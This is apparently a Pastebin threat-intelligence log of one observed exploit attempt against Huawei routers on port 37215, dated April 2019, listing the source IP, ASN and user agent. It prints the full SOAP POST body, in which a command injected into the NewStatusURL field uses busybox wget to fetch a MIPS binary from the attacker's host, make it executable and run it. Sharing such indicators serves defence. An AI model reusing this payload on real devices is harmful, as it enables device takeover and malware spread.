Advertisement
internetweather

Huawei RCE exploit attempt

Apr 6th, 2019
1,481
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.82 KB | None | 0 0
  1. Source IP 142.93.48.80
  2. Country United States
  3. ASN AS14061
  4. ASN Name DigitalOcean, LLC
  5. User Agent python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64
  6. Method POST
  7. URI /ctrlt/DeviceUpgrade_1
  8. POST Data "<?xml version=\x221.0\x22 ?>\x0A <s:Envelope xmlns:s=\x22http://schemas.xmlsoap.org/soap/envelope/\x22 s:encodingStyle=\x22http://schemas.xmlsoap.org/soap/encoding/\x22>\x0A <s:Body><u:Upgrade xmlns:u=\x22urn:schemas-upnp-org:service:WANPPPConnection:1\x22>\x0A <NewStatusURL>$(busybox wget -g 142.93.48.80 -l /tmp/rsh -r /akirabins/akira.mips ;chmod +x /tmp/rsh ;/tmp/rsh huawei)</NewStatusURL>\x0A<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\x0A</u:Upgrade>\x0A </s:Body>\x0A </s:Envelope>"
  9. Port Targeted 37215/tcp (Huawei Service Port)
  10. Recon Scan Type ZMap
  11. Date Last Seen 2019-04-06T16:58:57Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement